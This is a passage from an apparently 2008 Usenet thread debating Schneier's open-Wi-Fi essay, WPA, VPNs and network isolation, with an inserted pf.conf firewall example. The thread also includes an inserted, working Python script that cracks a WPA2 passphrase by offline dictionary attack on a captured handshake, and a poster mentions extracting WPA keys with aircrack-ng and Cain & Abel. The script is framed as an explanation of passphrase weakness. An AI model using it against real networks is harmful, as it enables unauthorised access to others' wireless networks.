sniffer can capture unencrypted traffic, passwords, email, etc.
>Schneier's point (applied to this
>analogy), isn't that you shouldn't move into a gated community, but
>rather that you should protect your house and its contents by applying
>security measures (locks on doors and windows) directly to the house.
>You can take it as a given that at some time, someone who doesn't belong
>in the gated community will find a way in.
Fine. I park my truck nearby, and setup my telescope, video camera,
long range microphone, electronic sniffer, etc. Maybe electronically
reconstruct the image on your CRT. Lots of ways to be intrusive, even
in a properly locked and secured house. Ready for TEMPEST grade
wallpaper and siding?
We can play this game forever. No amount of security is ever
sufficient. Given sufficient time, resources, and technology, any
level of security can eventually be compromised. That's why I detest
such security discussions. There's no right answers, no correct
solutions, and no guaranteed results.
However, that's all playing games with logic. What I find offensive
about Schneier's article is that he trashes the most basic and easiest
form of security, which in this case is WPA. To get decent security,
the one part of the puzzle that must work is WPA. Everything else can
be no more than an additional obstacle, usually of minor importance.
>Schneier's point
>isn't that there "might" be something wrong with WPA (or WPA2), it's
>that regardless of whether there is a known weakness with it now,
>as technology improves, the computing power that can be put towards
>brute-force attacks (and ultimately more calculated attacks) increases,
>and therefore the degree of security offered by technology that's "good
>enough" today decreases.
I beg to differ. He first announces that WPA is quite good. Then
declares that all such good encryption methods are eventually cracked.
On that basis, he somehow justifies running an open system.
Incidentally, I find the double negative in his statement rather
interesting. In psychology, that's a sure sign that he's uncertain
about his logic.
>If you think it's all FUD, consider the following (as one example):
>http://hothardware.com/News/Russian-Firm-Uses-NVIDIA-GPUs-To-Crack-WPA-WPA2/
Clever. There's wide selection of password recovery tools available
for assorted applications. There are also brute force WPA crackers
that work with fairly short WPA pass phrases.
<http://arstechnica.com/articles/paedia/wpa-cracked.ars/>
However, why bother? I can just grab the registry keys and extract a
usable WPA hash code (not the actual key) with aircrack-ng, Cain &
Abel, or others:
<http://www.passcape.com/wireless_keys_screenshots.htm>
<http://www.oxid.it/cain.html>
>Schneier's preference is for "easy" access to the network.
Yep. Same with Microsoft. Convenience and ease of use over security
and reliability. I'm not sure which is better. It makes no sense to
deliver a secure and reliable operating system that nobody can use.
Various Linux distributions were like that for a long time until they
wised up. I suspect a compromise is best. Wide open security is not
my idea of a good compromise between convenience and security.
>He claims to
>like it that way.
Sure. *I* also like it that way. Too bad it's not a good way to run
a wireless network. I have more problems with my coffee shop open
networks, than I ever have with those secured by a proper WPA key. Too
many things that can go wrong.
>However, his point is that trying to protect the data
>on the computer by attempting to secure access to the network is the
>wrong way to go about it (and in some cases might be seen as duplicated
>effort).
Yep. One of my former (not current) HIPAA customers uses an encrypted
database. In theory, one should not be able to view or extract useful
data without authorization and authentication. I demonstrated that I
could steal the entire drive, transplant it into a different machine,
and have access to all the data. They were not thrilled, especially
since some of their RAID array was missing. I'll spare you my opinion
of their security and software provider. I've had similar fiascos
with USB keys, remote access software, and of course, wireless. Also,
of the few real data security breaches I've had to deal with in
perhaps 25 years of playing repairman, the serious ones were from
insider hacking, theft of backup media, and outright theft of the
entire system. My current worries are about key loggers, trojans, and
defective software upgrades.
>See Bill Cheswick's paper on the design of Internet gateways
>(which a wireless access point can ultimately be) for another
>(compatible) explanation (that predates wireless networking; although
>the details of the technology have changed, the points are still valid,
>and on a broad scale we have not yet appeared to have learned them):
>http://www.cheswick.com/ches/papers/gateway.pdf
I read that 20 years ago. As you note, it's still valid. I'm
undecided as to whether it's better to protect the data or control
access. Since some of the problems I've had were from inside employee
hacking, I'm drifting toward protecting the data, and doing a minimal
effort on controlling access, permissions, etc. Dunno. I'm not a
security expert, just a repairman.
>> The part about leaving the car door open is called an analogy. Leave
>> the WPA security disabled because it might be cracked.
>
>That isn't at all Scheier's point. Leave WPA disabled, because he
>prefers to share the network access.
I again beg to differ. If that was his point, he shouldn't have
bothered to mention that WPA and all such security protocols would
eventually be cracked. He could have said something like "WPA works
and should be used. However, I prefer....etc". Instead, he implies
that WPA *MIGHT* be cracked, and uses that as justification for
running an open network. I honestly don't care why or how he runs his
open network. It's bad advice for the general public, most of whom
fail to appreciate the risks and implications.
>And by the way, even if WPA is
>considered a suitable way to secure access to your network at the moment,
>don't count on it to secure the data on your computer.
Ummm... it secures the data transport, not the computer. Now, if you
wanted to encrypt the entire drive, that might be useful to discourage
those that run open shares (public directories) on their laptops
because it's convenient.
>Referring back
>to my earlier analogy, that would be like counting on the locked gate at
>the end of the street to protect your home from being entered by
>unwelcome strangers.
I don't see the connection, as WPA only protects the vehicle that gets
you in and out of your gated community.
>He's not worrying about securing his wireless network because he's
>comfortable with how well the computers he has on that network are
>secured.
Good. I'm sure he also uses a VPN and SSH to talk to his work
computers. Great idea, but somehow missing in his article advocating
running an unencrypted network.
>The effort he invested in securing his computers is returned
>to him in his ability to not worry about the odd stranger using his
>wireless network (as someone might take a walk down the street of a
>gated community).
I would be worried if he's not worried. Most real security experts
that I know, are constantly worried about this or that threat. Every
time there's a new exploit announced, there's a flurry of nervous
activity. I had one such expert bail out in the middle of lunch when
someone detailed a new exploit that he hadn't heard about. I pay
security experts to be worried.
>Now, having said all of that, I keep my own wireless network secured,
>but all the computers I have that either use it, or are accessible from
>it, also are secured as well as they can be. I don't count on the
>wireless security to protect my computers, but I do expect that it will
>keep most uninvited strangers from using my network.
Again, wireless security (WPA) will not protect your computer. It
will protect your network from sniffing.
Incidentally, many of the laptops that people are buying have a built
in fingerprint reader. I think I've delivered about 3 of these in the
last few months. In all 3 cases, I set it up for using the
fingerprint reader, including showing the owner how to use it, and
training it for several of their fingers. 2 months later, none of
them are using the reader, and are instead using the backdoor
password, which in one case, was prominently displayed on a post-it
note. So much for improved access security.
>On Fri, 28 Nov 2008 16:18:57 -0500, John Mason Jr
>So, why does he recommend *LESS* wireless security? Did I miss
>something here?
Perhaps he's just being provocative.
>> "If I configure my computer to be secure regardless of the network
>>it's on, then it simply doesn't matter. And if my computer isn't secure
>>on a public network, securing my own network isn't going to reduce my
>>risk very much.
>
>Baloney. I could have an adequately secured computah (personal
>firewall) and still have problems. For example, sending un-encrypted
>email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>or an ethernet tap. The computer is secure, but the transport
>mechanism is not.
Amen. You have to run VPN to secure traffic on an open wireless
network, and it's much more cost and hassle to set up VPN than to
configure WPA.
>>Did you read the article?
>
>No, I was responding to what you wrote, not to what someone wrote in
>an article. You didn't make it clear that I had to read the article
>before climbing onto the ride. :)
Methinks you might find it useful to read the article before
attempting to criticize my interpretation of the article:
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
Enough ranting about security. I'm out of time.
>Jeff Liebermann wrote:
>> So, why does he recommend *LESS* wireless security? Did I miss
>> something here?
>
>In part of the article he states he doesn't believe that it is much of a
>risk that his wireless will be abused
There's ample evidence that open wireless will be abused, with
potentially negative consequences. All it takes is for the kid next
door to use your wireless to file share illicit materials (imagine
that); the RIAA and MPAA trace it back to your account; your computers
get seized and you get sued.
>> Baloney. I could have an adequately secured computah (personal
>> firewall) and still have problems. For example, sending un-encrypted
>> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>> or an ethernet tap. The computer is secure, but the transport
>> mechanism is not.
>
>I would consider fixing those type of problems part of making sure that
>your computer is safe on a public network.
It's a whole lot easier to run WPA than VPN.
>The network access point (wireless or otherwise) provides access to the
>network, not "security". That's the point I read in the article being
>discussed.
That would not be a valid point -- WPA does provide real and valuable
security. It's called Defense in Depth:
<http://en.wikipedia.org/wiki/Defense_in_Depth_(computing)>
If Bruce wasn't being provocative, he should be embarrassed and ashamed.
If you want to run open wireless as a public service, then you should
ideally use a wireless router that can strictly segregate the open
wireless from your private wireless and wired networks (e.g., NETGEAR
WG302), but unfortunately that's only available in relatively expensive
wireless routers (AFAIK).
An alternative is to run two wireless routers, one for yourself secured
with WPA, and one for the public unsecured, each with DHCP handing out
different blocks of private addresses, and isolate them from each other
with VLANs that allow each of them to connect to the Internet but not to
each other; e.g.,
Internet
|
+-------+--------+
|Private Wireless|
| Router with |
| VLAN isolation |
| (e.g., DD-WRT) |
+------------+---+
|
+-----+
|
+----+----+
|Public |
|Wireless |
|Router |
+---------+
>My house is private, it's not a hotel or a motel or a brothel or a
>Starbucks and I have a very secure WPA password. If we have guest want
>to use it, I give them the password. It's pretty simple really. The
>next-door neighbour who I trust fully also has the password in case his
>network goes down; he does the same for me (he's using WEP which I can
>crack if I want anyway). Although, we have the same ISP, so it's kind of
>a useless exercise in neighbourly admiration.
Simple but dangerous. Once the PSK (pre-shared key) is shared, it's
compromised -- you have no control over what those people will do with
it.
Worse, wireless sessions with PSK are *not* protected from each other,
so wireless traffic can be snooped by anyone with the PSK, intentionally
or otherwise (think infected computer).
Better to run WPA Enterprise, which allows you to hand out unique
credentials to anyone. Authentication options include ZyXEL G-2000 Plus
(wireless router with built-in PEAP server)
<http://www.zyxel.com/web/product_family_detail.php?PC1indexflag=20040520161313&CategoryGroupNo=1FD9B843-06BE-448D-B770-5383D40CD32E>
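As an added illustration for the two points above (it is not code from any poster in this thread, nor from aircrack-ng or the other tools Jeff mentions), the Python script below walks through WPA2-PSK key derivation and then runs the same offline dictionary attack the brute-force crackers use against a captured 4-way handshake. The SSID "IEEE" and passphrase "password" are the IEEE 802.11i PMK test vector; the MAC addresses, nonces and the EAPOL message-2 bytes are constructed sample values standing in for a real capture, and the function names are mine. It shows that everything needed to rebuild a client's pairwise keys except the PMK travels in the clear, so anyone handed the PSK can derive another client's session keys, and that each passphrase guess costs one PBKDF2 run plus a MIC compare, which is what makes short passphrases fall quickly.

```python
# Added example: WPA2-PSK key derivation and an offline dictionary attack on a
# captured 4-way handshake. Written for this thread; not code from any poster
# or from aircrack-ng. Standard library only.
import hashlib
import hmac

SSID = "IEEE"                 # SSID/passphrase pair from the IEEE 802.11i PMK test vector
TRUE_PASSPHRASE = "password"  # deliberately weak, which is the point

# Constructed sample values standing in for what a sniffer sees on the air.
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))          # real stations use random nonces; fixed here for repeatability
SNONCE = bytes(range(32, 64))
# Abbreviated stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed:
# header + descriptor/key-info/key-length + replay counter + SNonce + zero MIC.
EAPOL_MSG2_ZEROED_MIC = bytes.fromhex("0103005f02010a0000") + b"\x00" * 8 + SNONCE + b"\x00" * 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus four values that are sent in the clear during the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes) -> bytes:
    """WPA2 (AKM 2) EAPOL-Key MIC: HMAC-SHA1 under the KCK (first 16 bytes of the PTK), cut to 16 bytes."""
    return hmac.new(kck, eapol_zeroed_mic, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str = TRUE_PASSPHRASE) -> dict:
    """What a passive sniffer records: both MACs, both nonces, message 2, and the MIC the
    legitimate client computed from the real PMK."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {
        "ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
        "anonce": ANONCE, "snonce": SNONCE,
        "eapol_zeroed": EAPOL_MSG2_ZEROED_MIC,
        "mic": eapol_mic(ptk[:16], EAPOL_MSG2_ZEROED_MIC),
    }


def ptk_from_shared_psk(psk_passphrase: str, capture: dict) -> bytes:
    """A neighbour who was handed the passphrase rebuilds the victim's PTK from the capture
    alone, and from there can verify the MIC and decrypt that client's traffic."""
    pmk = pmk_from_passphrase(psk_passphrase, capture["ssid"])
    return derive_ptk(pmk, capture["ap_mac"], capture["client_mac"],
                      capture["anonce"], capture["snonce"])


def crack_psk(candidates, capture: dict):
    """Offline dictionary attack: one PBKDF2, one PTK derivation and one MIC compare per guess."""
    for guess in candidates:
        ptk = ptk_from_shared_psk(guess, capture)
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol_zeroed"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    cap = capture_handshake()
    print("PMK (802.11i test vector):", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", crack_psk(["letmein", "12345678", "password"], cap))
```

Two things worth noticing. First, nothing in `ptk_from_shared_psk` requires the attacker to be associated or to send a frame; hearing one handshake is enough, which is why sharing the PSK means sharing every other client's session keys, and why WPA Enterprise (a fresh PMK per session) closes that hole. Second, the only cost per guess is the 4096 HMAC-SHA1 rounds inside PBKDF2, so a GPU that runs that loop in parallel (the article Sylvain linked) does not break WPA, it just makes a short or dictionary passphrase fall sooner; a long diceware passphrase is the defence. WPA (TKIP) uses HMAC-MD5 for the MIC instead of HMAC-SHA1, which is the one change needed for that case.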
>On Sat, 29 Nov 2008 07:45:35 +0000 (UTC), Sylvain Robitaille
><s...@alcor.concordia.ca> wrote:
>>However, his point is that trying to protect the data
>>on the computer by attempting to secure access to the network is the
>>wrong way to go about it (and in some cases might be seen as duplicated
>>effort).
>
>Yep. One of my former (not current) HIPAA customers uses an encrypted
>database. In theory, one should not be able to view or extract useful
>data without authorization and authentication. I demonstrated that I
>could steal the entire drive, transplant it into a different machine,
>and have access to all the data. They were not thrilled, especially
>since some of their RAID array was missing. I'll spare you my opinion
>of their security and software provider.
That's why I'm a big fan of hard disk passwords, and even better
encrypting hard disks. You could steal my laptop, but you'd not be able
to access any of the data on the hard disk (short of major forensic
cracking at least).
>I've had similar fiascos
>with USB keys, remote access software, and of course, wireless. Also,
>of the few real data security breaches I've had to deal with in
>perhaps 25 years of playing repairman, the serious ones were from
>insider hacking, theft of backup media, and outright theft of the
>entire system. My current worries are about key loggers, trojans, and
>defective software upgrades.
Agreed.
>I read that 20 years ago. As you note, it's still valid. I'm
>undecided as to whether it's better to protect the data or control
>access. Since some of the problems I've had were from inside employee
>hacking, I'm drifting toward protecting the data, and doing a minimal
>effort on controlling access, permissions, etc. Dunno. I'm not a
>security expert, just a repairman.
Likewise.
>... He could have said something like "WPA works
>and should be used. However, I prefer....etc". Instead, he implies
>that WPA *MIGHT* be cracked, and uses that as justification for
>running an open network. ...
It's a bit like saying, condoms sometimes fail, so don't bother to use
them. Really, really stupid. I'm sure he knows better.
>... Now, if you
>wanted to encrypt the entire drive, that might be useful to discourage
>those that run open shares (public directories) on their laptops
>because it's convenient.
Nope. Once the computer is running the drive is unlocked.
>Again, wireless security (WPA) will not protect your computer. It
>will protect your network from sniffing.
WPA does protect your computer from attack over the wireless network.
<snip>
> The part about leaving the car door open is called an analogy. Leave
> the WPA security disabled because it might be cracked. Leave the car
> unlocked because the door locks might be picked. All analogies break
> down under sufficient scrutiny, but methinks these are sufficiently
> close to survive.
<snip>
In my experience, I find it far better to leave the car's doors unlocked
(especially when it is likely to experience a break-in) than have to
endure the damage caused by forced entry and subsequent costs of repair.
Just make sure not to leave valuables in the car. Likewise with an
open access point - provide nothing of value to the intruder and provide
advertisement about your network, website, etc. in the event of
a visitor.
>
> Did you read the article? Bruce Schneier never actually came out and
> recommended that one should not use wireless security. Yet the entire
> article is all about how wonderful and easy things are without that
> horribly difficult wireless security, and how successful he and others
> have been running wide open system.
<snip>
I have not read the article but I tend to agree that association and joining
of a wireless network in a residential or public space is best done wide
open, with the security at other layers, rather than at the access point.
In a mission-critical wireless network however, good security for joining
the network may be needed if even just for bandwidth management.
Michael
>That's why I'm a big fan of hard disk passwords, and even better
>encrypting hard disks. You could steal my laptop, but you'd not be able
>to access any of the data on the hard disk (short of major forensic
>cracking at least).
I'm lazy. I just keep my major files and apps on a USB drive:
<http://portableapps.com>
The important files are individually encrypted. I tried using the
encryption utilities that came with the drive, but had problems. The
big problem is that the USB flash drive is much slower than a hard
disk. That's a problem when Firefox has to load and index a zillion
email messages.
>It's a bit like saying, condoms sometimes fail, so don't bother to use
>them. Really, really stupid. I'm sure he knows better.
I dunno. I looked carefully at his writing style. Besides the
previously mentioned revealing slip (double negative), I see at least
3 different sentence styles and 4 different paragraph structures. It
kinda looks like this is a conglomeration of several articles, with
heavy editing by the Wired Magazine editors. It might even be
possible that someone else added that paragraph. Dunno, but sad.
>>Again, wireless security (WPA) will not protect your computer. It
>>will protect your network from sniffing.
>
>WPA does protect your computer from attack over the wireless network.
I use the router's "AP isolation" feature (which is actually client
isolation) to keep the connected client laptops from both seeing and
attacking each other. You could be running a totally insecure laptop,
with wide open shares, and still be safe from wireless attack in a
coffee shop. However, that does nothing to prevent wireless sniffing.
> On Fri, 28 Nov 2008 19:24:04 -0800, Jeff Liebermann <je...@cruzio.com>
<snip>
> Amen. You have to run VPN to secure traffic on an open wireless
> network, and it's much more cost and hassle to set up VPN than to
> configure WPA.
But IMHO a preferred solution for all types of networks susceptible
to snooping. I prefer an open WAP with all private traffic over
encrypted tunnels and public access for strangers with various
advisories available in html, ftp, etc. advising terms of use.
Bandwidth controls may need to be implemented separately to handle
DoS attacks.
Michael
> He's not worrying about securing his wireless network because he's
> comfortable with how well the computers he has on that network are
> secured.
Then his article is highly disingenuous, or he really is a fool. Does he
run an encrypted VPN between every computer on his network? Is all
traffic to the internet encrypted, including email?
And more to the point, does he explain in the article that you need to
do all this stuff, and explain how to do it? Er, no. He leaves that as
an exercise to the reader. Or, perish the thought, perhaps he would
quite like them to call his firm to ask for professional help setting it
up.
> The effort he invested in securing his computers is returned
> to him in his ability to not worry about the odd stranger using his
> wireless network (as someone might take a walk down the street of a
> gated community).
And presumably his ISP doesn't have a policy against it.
Just one other question - is Bruce also blase about the odd
porn-merchant and spammer using his connection? If so, we know exactly
how valuable his advice is.
Sure, it's unlikely. There are 500,000 compromised PCs currently trying
to reconnect to a spam hub after McColo was taken out, I expect their
owners /also/ thought the risks were too low to worry about. They were
wrong.
>On Sat, 29 Nov 2008 11:49:01 -0800, John Navas
><spamf...@navasgroup.com> wrote:
>
>>That's why I'm a big fan of hard disk passwords, and even better
>>encrypting hard disks. You could steal my laptop, but you'd not be able
>>to access any of the data on the hard disk (short of major forensic
>>cracking at least).
>
>I'm lazy. I just keep my major files and apps on a USB drive:
><http://portableapps.com>
>The important files are individually encrypted. I tried using the
>encryption utilities that came with the drive, but had problems. The
>big problem is that the USB flash drive is much slower than a hard
>disk. That's a problem when Firefox has to load and index a zillion
>email messages.
I'm lazy too. My primary fast hard disk is unlocked by the same
password that unlocks my computer. Couldn't be easier or faster.
>>>Again, wireless security (WPA) will not protect your computer. It
>>>will protect your network from sniffing.
>>
>>WPA does protect your computer from attack over the wireless network.
>
>I use the router's "AP isolation" feature (which is actually client
>isolation) to keep the connected client laptops from both seeing and
>attacking each other. You could be running a totally insecure laptop,
>with wide open shares, and still be safe from wireless attack in a
>coffee shop. However, that does nothing to prevent wireless sniffing.
Fair enough, but WPA does nonetheless protect your computer against
wireless attack, with the caveat that you're not protected from wireless
clients using the same PSK.
If you did that in a car-park in the UK, you'd almost certainly return
to an empty space and your car would be on its way to Nigeria.
> (especially when it is likely to experience a break-in) than have to
> endure the damage caused by forced entry and subsequent costs of repair.
A mate of mine did that - he had a soft-top TVR and it was very costly
to fix the hood. Car never got nicked because it was LHD and a pig to
drive.
>Jeff Liebermann wrote:
>
>> The part about leaving the car door open is called an analogy. Leave
>> the WPA security disabled because it might be cracked. Leave the car
>> unlocked because the door locks might be picked. All analogies break
>> down under sufficient scrutiny, but methinks these are sufficiently
>> close to survive.
>In my experience, I find it far better to leave the car's doors unlocked
>(especially when it is likely to experience a break-in) than have to
>endure the damage caused by forced entry and subsequent costs of repair.
>Just make sure not to leave valuables in the car. Likewise with an
>open access point - provide nothing of value to the intruder and provide
>advertisement about your network, website, etc. in the event of
>a visitor.
Simply running a wireless network is an advertisement, and even with
encrypted tunnels your computers are still open to attack unless you
also have wireless to wireless isolation (along with wireless to wired
isolation if you have wired computers as well). You otherwise increase
your vulnerability substantially.
>> Did you read the article? Bruce Schneier never actually came out and
>> recommended that one should not use wireless security. Yet the entire
>> article is all about how wonderful and easy things are without that
>> horribly difficult wireless security, and how successful he and others
>> have been running wide open system.
>I have not read the article ...
Then with all due respect you really shouldn't be commenting.
> On Sat, 29 Nov 2008 15:53:00 -0600, msg <msg@_cybertheque.org_> wrote in
> <adqdnRzM59k0JKzU...@posted.cpinternet>:
>
>
>>Jeff Liebermann wrote:
>>
>>
>>>The part about leaving the car door open is called an analogy. Leave
>>>the WPA security disabled because it might be cracked. Leave the car
>>>unlocked because the door locks might be picked. All analogies break
>>>down under sufficient scrutiny, but methinks these are sufficiently
>>>close to survive.
>
>
>>In my experience, I find it far better to leave the car's doors unlocked
>>(especially when it is likely to experience a break-in) than have to
>>endure the damage caused by forced entry and subsequent costs of repair.
>>Just make sure not to leave valuables in the car. Likewise with an
>>open access point - provide nothing of value to the intruder and provide
>>advertisement about your network, website, etc. in the event of
>>a visitor.
>
>
> Simply running a wireless network is an advertisement, and even with
> encrypted tunnels your computers are still open to attack unless you
> also have wireless to wireless isolation (along with wireless to wired
> isolation if you have wired computers as well). You otherwise increase
> your vulnerability substantially.
Please elaborate what forms of attack you consider likely here and why
segment isolation is indicated? When the only routes available to
the stranger wireless client are directed to an isolated honeypot that
serves as an advertisement vehicle (not SSID adverts, but real html, text,
etc. adverts and terms of use statements), and useful routes are only
accessible through the tunnels (IPSec), what attack do you anticipate?
As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
for policy decisions on the internal network and not in the domain of
wireless security
>
>>>Did you read the article? Bruce Schneier never actually came out and
>>>recommended that one should not use wireless security. Yet the entire
>>>article is all about how wonderful and easy things are without that
>>>horribly difficult wireless security, and how successful he and others
>>>have been running wide open system.
>
>
>>I have not read the article ...
>
>
> Then with all due respect you really shouldn't be commenting.
Huh? If you quoted my full statement in context you would see that I am
agreeing with a proposition of the quoted poster, not something from the
'unread' article.
Michael
Quite!
I've read it and the final para does actually say "In my opinion,
securing my wireless network isn't worth it." which has an obvious
unspoken continuation.
"I don't bother to secure my network, and I'm a security /expert/ so...."
>John Navas wrote:
>> Simply running a wireless network is an advertisement, and even with
>> encrypted tunnels your computers are still open to attack unless you
>> also have wireless to wireless isolation (along with wireless to wired
>> isolation if you have wired computers as well). You otherwise increase
>> your vulnerability substantially.
>
>Please elaborate what forms of attack you consider likely here and why
>segment isolation is indicated? When the only routes available to
>the stranger wireless client are directed to an isolated honeypot
I saw nothing about this in your earlier post. Are you scrambling? ;)
Regardless, how exactly is this set up?
>that
>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>etc. adverts and terms of use statements), and useful routes are only
>accessible through the tunnels (IPSec), what attack do you anticipate?
Any of the myriad of possible attacks.
>As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
>for policy decisions on the internal network and not in the domain of
>wireless security
I disagree -- it's all one network.
"Those who cannot remember the past are condemned to repeat it."
-George Santayana
On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
<notv...@cox.net.invalid> wrote in <ggpgmh$j7u$1...@nntp.motzarella.org>:
>Interesting counter point to securing your wireless
>
><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>John
>
>
>John Navas wrote:
>> <http://wireless.navas.us/wiki/Wi-Fi#Essential_Checklist>
>>
>> * Use WPA security. If you don't do this, assume you will get hacked.
>> WEP is essentially worthless. Replace wireless equipment that doesn't
>> support WPA. Seriously. (See Wi-Fi Security)
>>
>> * Use a strong WPA passphrase. A good way to do that is with diceware
>> words. (See What Makes for a Strong Password or Passphrase?) Write your
>> passphrase on a label and stick it on the bottom of your wireless router
>> so you won't forget it. (If someone gets to your wireless router, you
>> are compromised regardless.)
>>
>> * Make your wireless SSID unique. This helps avoid network collisions. A
>> good way to do this is to use your address, phone number, and/or name
>> for your SSID (making it easy for you to be contacted if something is
>> wrong with your wireless network).
>>
>> * Don't bother with SSID hiding or MAC address filtering. They don't do
>> any real good (improve security) but they can cause you grief. (See
>> Wi-Fi Security Myths)
>>
>> * Turn off Universal Plug and Play (UPnP) in your wireless router.
>> Because most consumer-grade wireless routers lack UPnP authentication
>> they are vulnerable to attack. (See Problems with UPnP, Lack of
>> Authentication)
>>
>> * Set a strong password on the administration interface of your wireless
>> router. Again, diceware is a good way to do that.
>>
>> * Turn off remote administration. If your wireless router supports
>> remote administration, turn it off (unless you really know what you're
>> doing).
>>
>> * On unsecured Wi-Fi use VPN (Virtual Private Networking). Otherwise
>> your wireless traffic can be snooped and compromised. (See Secure
>> Internet access in a public hotspot)
> As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
> for policy decisions on the internal network and not in the domain of
> wireless security
Euh, that's the kind of approach that leads to costly customer data loss.
Security policy shouldn't be divided up into little empires.
> On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
> <wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>
>>John Navas wrote:
>
>
>>>Simply running a wireless network is an advertisement, and even with
>>>encrypted tunnels your computers are still open to attack unless you
>>>also have wireless to wireless isolation (along with wireless to wired
>>>isolation if you have wired computers as well). You otherwise increase
>>>your vulnerability substantially.
>>
>>Please elaborate what forms of attack you consider likely here and why
>>segment isolation is indicated? When the only routes available to
>>the stranger wireless client are directed to an isolated honeypot
>
>
> I saw nothing about this in your earlier post. Are you scrambling? ;)
I configure my external wireless networks as I would any wired network,
anticipating, and even expecting and possibly suggesting that strangers
'plug in' to it (wired or wireless -- it shouldn't matter). Should I
design some ethernet scrambling technology too (at the physical layer)
<grin>?
> Regardless, how exactly is this set up?
The external wireless access points are on an IP subnet routed by an OpenBSD
border router which also is the head end for IPsec and IKE from external
wireless; nothing else is on that subnet. Stranger clients get access
to a limited set of resources (for advertising purposes) such as http
to an internal server, DNS, DHCP, and IKE and VPN negotiation services;
all services are handled by port forwarding and in some cases internal
NATing. The address pool presented to the external client is RFC 1918;
stranger clients are welcome to browse the presented web pages, use the
bulletin board, or do other things as I see fit; the only security
issues for me here are at the service endpoints -- the user can sniff
all he wants and will only see this traffic or encrypted payloads from
VPN users.
>
>
>>that
>>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>>etc. adverts and terms of use statements), and useful routes are only
>>accessible through the tunnels (IPSec), what attack do you anticipate?
>
>
> Any of the myriad of possible attacks.
>
>
>>As for 'internal' security, (on the VPN, VLANS, etc), that is a matter
>>for policy decisions on the internal network and not in the domain of
>>wireless security
>
>
> I disagree -- it's all one network.
I cannot imagine (in an unclassified network) imposing draconian network
level security on internal users; applications, database encryption, access
control etc. seems to me to be more appropriate at this level.
Michael
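As an added illustration of the setup Michael describes (not his actual configuration), here is an OpenBSD pf.conf fragment that gives the open wireless subnet only DHCP, DNS, the port-forwarded advertising web server, and IKE/ESP to the border router, and drops everything else. Interface names and addresses are assumed; rules for the internal LAN and upstream link are omitted.

```pf
# Added example, not the poster's own ruleset. Interface names and
# addresses below are assumptions chosen for illustration.
int_if   = "em1"            # internal LAN (assumed)
wifi_if  = "ath0"           # open wireless subnet, nothing else attached (assumed)
wifi_net = "10.10.0.0/24"   # RFC 1918 pool handed to stranger clients (assumed)
wifi_gw  = "10.10.0.1"      # border router's address on that subnet (assumed)
ad_srv   = "192.168.1.10"   # internal web/bulletin-board host (assumed)

set skip on lo
block log all               # default deny in every direction; log what is dropped

# DHCP: a client without a lease sends from 0.0.0.0 to the broadcast
# address, so the source cannot be matched against $wifi_net.
pass in  quick on $wifi_if inet proto udp from any port 68 to any port 67
pass out quick on $wifi_if inet proto udp from any port 67 to any port 68

# DNS is answered by the border router itself
pass in quick on $wifi_if inet proto { tcp, udp } from $wifi_net to $wifi_gw port 53

# Advertising pages: HTTP aimed at the router is port-forwarded to the
# internal server. The state created here is floating (pf's default), so
# it also covers the forwarded packet leaving on $int_if.
pass in quick on $wifi_if inet proto tcp from $wifi_net to $wifi_gw port 80 rdr-to $ad_srv

# IKE (UDP 500, NAT-T on 4500) and ESP terminate on the border router;
# traffic for internal resources only exists inside those tunnels.
pass in quick on $wifi_if inet proto udp from $wifi_net to $wifi_gw port { 500, 4500 }
pass in quick on $wifi_if inet proto esp from $wifi_net to $wifi_gw

# Anything else from the stranger subnet, including attempts to reach
# $int_if addresses directly, is dropped and logged for review.
block log quick on $wifi_if from $wifi_net to any
```

Note that this ruleset only separates the wireless subnet from the wired side; frames between two clients on the same access point never reach the router, so wireless-to-wireless isolation has to be enabled on the access point itself.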
>On Sat, 29 Nov 2008 17:11:09 -0600, msg <msg@_cybertheque.org_> wrote in
><wvmdnYvABfFnVqzU...@posted.cpinternet>:
>
>>John Navas wrote:
>
>>> Simply running a wireless network is an advertisement, and even with
>>> encrypted tunnels your computers are still open to attack unless you
>>> also have wireless to wireless isolation (along with wireless to wired
>>> isolation if you have wired computers as well). You otherwise increase
>>> your vulnerability substantially.
>>
>>Please elaborate what forms of attack you consider likely here and why
>>segment isolation is indicated? When the only routes available to
>>the stranger wireless client are directed to an isolated honeypot
>
>I saw nothing about this in your earlier post. Are you scrambling? ;)
>Regardless, how exactly is this set up?
>
>>that
>>serves as an advertisement vehicle (not SSID adverts, but real html, text,
>>etc. adverts and terms of use statements), and useful routes are only
